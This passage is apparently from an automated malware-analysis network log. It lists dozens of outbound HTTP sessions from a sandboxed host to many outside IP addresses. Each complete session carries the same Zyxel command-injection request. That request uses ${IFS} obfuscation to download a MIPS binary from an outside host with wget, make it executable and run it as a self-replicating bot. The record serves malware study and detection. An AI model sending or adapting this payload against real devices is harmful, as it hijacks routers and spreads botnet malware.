                                                      2271192.168.2.144780874.42.60.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445509911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2272192.168.2.143810893.231.209.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445560932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2273192.168.2.143743674.16.229.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445684910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2274192.168.2.1455570110.0.63.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445714951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2275192.168.2.144337042.199.210.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445725918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2276192.168.2.145247689.10.55.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445725918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2277192.168.2.1453340191.28.63.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445732117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2278192.168.2.145493817.190.41.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445786953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2279192.168.2.1436954218.224.252.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445825100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2280192.168.2.1457400154.27.54.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445883036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2281192.168.2.1442216105.157.73.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445919991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2282192.168.2.1450146195.157.95.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445966959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2283192.168.2.143855485.165.36.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445996046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2284192.168.2.1433630131.155.117.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446039915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2285192.168.2.1452450124.73.153.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446067095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2286192.168.2.145123038.40.98.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446149111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2287192.168.2.1460092219.39.230.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446166992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2288192.168.2.1445244216.225.66.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446242094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2289192.168.2.14577602.30.6.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446258068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2290192.168.2.143357067.238.70.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446320057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2291192.168.2.145023240.191.82.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446378946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2292192.168.2.145071247.145.40.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446413994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2293192.168.2.1450622190.145.45.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446420908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2294192.168.2.1443074206.61.78.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446461916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2295192.168.2.1440704107.217.137.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446508884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2296192.168.2.1445272148.160.234.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446556091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2297192.168.2.1451720220.4.39.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446580887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2298192.168.2.1452824115.197.251.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446635962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2299192.168.2.144274445.20.131.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446667910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2300192.168.2.1432774152.134.49.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446700096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2301192.168.2.1455076200.24.48.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446751118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2302192.168.2.1436698208.225.120.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446790934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2303192.168.2.1456116190.147.222.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446824074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2304192.168.2.143912649.95.214.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446863890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2305192.168.2.144130435.5.157.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446896076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2306192.168.2.1456714203.187.113.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446940899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2307192.168.2.1443572163.38.59.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.446968079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2308192.168.2.1455068170.147.141.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447005033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2309192.168.2.1434770139.108.217.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447046995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2310192.168.2.1434340196.88.241.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447092056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2311192.168.2.1433926115.248.242.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447146893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2312192.168.2.1454664140.196.252.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447180986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2313192.168.2.1457526155.0.85.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447227955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2314192.168.2.1459378149.169.110.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447251081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2315192.168.2.143921424.194.187.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447288036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2316192.168.2.1439784153.106.99.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447345018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2317192.168.2.1450650117.183.244.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447381973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2318192.168.2.143854046.35.94.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447442055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2319192.168.2.1449760180.6.6.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447479010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2320192.168.2.145609290.154.57.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447527885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2321192.168.2.1449120110.174.158.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447570086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2322192.168.2.1456026101.30.48.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447601080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2323192.168.2.144209265.73.24.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447638035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2324192.168.2.1433638206.148.45.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447685957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2325192.168.2.1439612204.234.199.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447710991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2326192.168.2.1452296130.186.139.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447757006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2327192.168.2.145819461.99.152.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447788000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2328192.168.2.1456194196.134.113.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447829962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2329192.168.2.144551074.233.238.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447851896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2330192.168.2.1454428179.220.79.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447887897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2331192.168.2.1448942108.68.241.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447926044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2332192.168.2.14572362.111.140.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.447961092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2333192.168.2.144846446.121.245.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448002100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2334192.168.2.1450690179.89.197.55443
